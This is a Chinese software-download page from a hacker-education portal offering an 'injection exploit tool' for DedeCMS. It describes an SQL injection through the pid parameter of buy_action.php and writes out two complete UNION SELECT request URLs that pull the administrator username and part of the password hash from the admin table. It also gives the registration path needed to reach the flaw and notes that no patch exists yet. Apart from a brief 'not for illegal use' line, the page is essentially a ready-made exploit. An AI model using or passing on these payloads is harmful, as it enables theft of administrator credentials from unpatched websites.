

DEDECMS最新注射漏洞利用工具
|
软件简介软件利用:
漏洞出现在buy_action.php 没有对pid传递进行足够的重视
导致出现SQL注射问题!
注册地址:
/member/index_do.php?fmdo=user&dopost=regnew
爆管理帐号:
/member/buy_action.php?product=member&pid=1%20and%201=11%20union%20select%201,2,userid,4,5%20from%20%23@__admin/*
爆管理员密码
/member/buy_action.php?product=member&pid=1%20and%201=11%20union%20select%201,2,substring(pwd,9,16),4,5%20from%20%23@__admin/*
Power by DedeCms
请勿用于非法用途,DEDE官方目前还没有发布补丁,希望BLT早日发出安全补丁
相关软件
下载说明| ·注意:为达到最快速度,推荐使用网际快车[Flashget]下载本站软件! ·如果出现该页无法显示,请多试几次;如果总是不能下载,请通知管理员,谢谢! ·站内提供的所有软件均是由网上搜集,若侵犯了您的权益,敬请来信通知我们。 ·任何从本站下载的破解文件、破解补丁、注册机、注册码、注册文件等一切形式的“特别信息”仅能作为学习研究目的使用,请您于24小时内自觉将其删除并向软件著者购买使用许可证。 ·请一定升级到最新版[WinRAR]才能正常解压本站提供的软件;如有其它问题,欢迎联系管理员. ·由于网站服务器承受能力有限,请其他网站不要直接链接我们提供的软件,谢谢!! |
黑客在线·中国第一黑客教育门户
最新推荐
本周排行
本月排行